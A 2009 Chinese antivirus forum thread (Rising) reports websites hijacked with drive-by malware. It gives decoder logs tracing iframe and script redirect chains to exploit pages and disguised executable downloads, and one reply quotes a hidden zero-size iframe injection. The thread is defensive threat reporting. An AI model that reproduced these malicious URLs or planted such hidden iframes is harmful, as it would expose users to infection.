瑞星网站每日安全播报(2009年11月13日) bbs.ikaka.com

networkedition - 2009-11-13 14:45:00

引用:

网址均来自瑞星每日安全播报，我们详细分析其中所挂恶意网址，对于已失效的恶意网址就不再分析。

引用:

注：以下分析出的恶意网址均包含有真实网马下载地址，请勿直接下载并运行，以免系统中招。

引用:

1. http://www.1010job.com/（欢迎访问 1010Job 精英招聘全球首选中文求职搜索引擎）
2 .http://fygwxy.suda.edu.cn/(欢迎访问苏州大学放射医学院与公共卫生学院）
3. http://kj.chd.edu.cn/（长安大学科技处）

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

networkedition - 2009-11-13 14:46:00

Log generated by networkedition use mdecoder 0.27
[root]http://www.1010job.com/index_bj.htm
[script]http://www.1010job.com/common/pwd_encr.js
[script]http://yourspaces.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://chunrang.com.cn
[iframe]http://sale.php?domain=chunrang.com.cn
[script]http://hn3gp.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://fujianclub.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://urbanhub.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://hhhtlive.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://mobihomes.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[iframe]http://h0198.cn/x2/xx.html
[iframe]http://h0198.cn/x2/td14.htm
[iframe]http://h0198.cn/x2/yt.htm
[script]http://h0198.cn/x2/ll.jpg
[script]http://h0198.cn/x2/ll1.jpg
[script]http://h0198.cn/x2/lll.jpg
[exe]http://d.ydopx.com/xx/x2.css
[script]http://h0198.cn/x2/llll1.jpg
[script]http://h0198.cn/x2/llll.jpg
[script]http://h0198.cn/x2/lllll.jpg
[iframe]http://h0198.cn/x2/tdi.htm
[script]http://h0198.cn/x2/pp.js
[script]http://h0198.cn/x2/pp1.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/yut.htm
[iframe]http://h0198.cn/x2/ytfl1.htm
[iframe]http://h0198.cn/x2/x1.htm
[script]http://h0198.cn/x2/swfobject.js
[flash]http://h0198.cn/x2/./x1.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x3.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x4.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x2.swf
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/x2.htm
[script]http://h0198.cn/x2/swfobject.js
[flash]http://h0198.cn/x2/./x7.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x9.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x10.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x8.swf
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/x1.htm
[iframe]http://h0198.cn/x2/of.htm
[script]http://h0198.cn/x2/of1.js
[script]http://h0198.cn/x2/of.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/ytu.htm
[iframe]http://h0198.cn/x2/ytfl.htm
[iframe]http://h0198.cn/x2/ff.html
[script]http://h0198.cn/x2/ff.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/ie.html
[script]http://h0198.cn/x2/ie.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/ff.html
[iframe]http://h0198.cn/x2/ie.html
[iframe]http://h0198.cn/x2/ff.html
[iframe]http://h0198.cn/x2/ff.html
[script]http://chnianame.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://singaporebbs.cn
[iframe]http://sale.php?domain=singaporebbs.cn
[script]http://nmghlbr.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://369tmz.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://yourspaces.cn
[script]http://chunrang.com.cn
[script]http://hn3gp.cn
[script]http://fujianclub.cn
[script]http://urbanhub.cn
[script]http://hhhtlive.cn
[script]http://mobihomes.cn
[script]http://chnianame.cn
[script]http://singaporebbs.cn
[script]http://nmghlbr.cn
[script]http://369tmz.cn
[script]http://www.1010job.com/common/lc.js
[script]http://www.google-analytics.com/urchin.js

networkedition - 2009-11-13 14:46:00

Log generated by networkedition use mdecoder 0.27
[root]http://fygwxy.suda.edu.cn/?RisingToken=941448373620
[iframe]http://219.145.124.9/dtt/inc/index.htm
[iframe]http://219.145.124.9/dtt/inc/1.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/office.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/2.htm
[script]http://219.145.124.9/dtt/inc/flashme.js
[flash]http://219.145.124.9/dtt/inc/flashme.swf
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/8.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/3.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/4.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/5.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/9.htm
[script]http://219.145.124.9/dtt/inc/go.jpg
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/6.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/7.htm
[exe]http://jinjie-outlets.com/css/la.exe
[iframe]http://219.145.124.9/dtt/inc/7.htm
[iframe]http://219.145.124.9/js/god.htm

networkedition - 2009-11-13 14:47:00

Log generated by networkedition use mdecoder 0.27
[root]http://kj.chd.edu.cn/
[script]http://nmghlbr.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[iframe]http://h0198.cn/x2/xx.html
[iframe]http://h0198.cn/x2/td14.htm
[iframe]http://h0198.cn/x2/yt.htm
[script]http://h0198.cn/x2/ll.jpg
[script]http://h0198.cn/x2/ll1.jpg
[script]http://h0198.cn/x2/lll.jpg
[exe]http://d.ydopx.com/xx/x2.css
[script]http://h0198.cn/x2/llll1.jpg
[script]http://h0198.cn/x2/llll.jpg
[script]http://h0198.cn/x2/lllll.jpg
[iframe]http://h0198.cn/x2/tdi.htm
[script]http://h0198.cn/x2/pp.js
[script]http://h0198.cn/x2/pp1.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/yut.htm
[iframe]http://h0198.cn/x2/ytfl1.htm
[iframe]http://h0198.cn/x2/x1.htm
[script]http://h0198.cn/x2/swfobject.js
[flash]http://h0198.cn/x2/./x1.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x3.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x4.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x2.swf
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/x2.htm
[script]http://h0198.cn/x2/swfobject.js
[flash]http://h0198.cn/x2/./x7.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x9.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x10.swf
[exe]http://d.ydopx.com/xx/x2.css
[flash]http://h0198.cn/x2/./x8.swf
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/x1.htm
[iframe]http://h0198.cn/x2/of.htm
[script]http://h0198.cn/x2/of1.js
[script]http://h0198.cn/x2/of.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/ytu.htm
[iframe]http://h0198.cn/x2/ytfl.htm
[iframe]http://h0198.cn/x2/ff.html
[script]http://h0198.cn/x2/ff.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/ie.html
[script]http://h0198.cn/x2/ie.js
[exe]http://d.ydopx.com/xx/x2.css
[iframe]http://h0198.cn/x2/ff.html
[iframe]http://h0198.cn/x2/ie.html
[iframe]http://h0198.cn/x2/ff.html
[iframe]http://h0198.cn/x2/ff.html
[script]http://sharetechnology.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://hljdxal.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://liaoninghouse.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://avsteel.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://softwaresystems.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://tianjincn.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://tlfhouse.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://612100.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://stoneb.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://sportsindex.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://altzx.cn
[iframe]http://hqp3.6600.org/dszq/2.htm
[script]http://tianjincn.cn
[script]http://tlfhouse.cn
[script]http://612100.cn
[script]http://stoneb.cn
[script]http://sportsindex.cn
[script]http://altzx.cn

yml8888 - 2009-11-13 23:18:00

我的卡卡一个也不拦截？360拦截

erryliu - 2009-11-14 17:33:00

erryliu - 2009-11-14 17:34:00

http://www.tanfukang.com/s/绝对算一个，我们公司网站就被挂了<iframe src="http://www.tanfukang.com/s/" height="0" width="0"></iframe>

woshilifeng - 2009-11-15 18:59:00

我太晕啦？上网就有马:kaka7:

完美1214 - 2009-11-16 11:53:00

为什么我电脑用杀毒杀了总是还有毒

瑞星卡卡安全论坛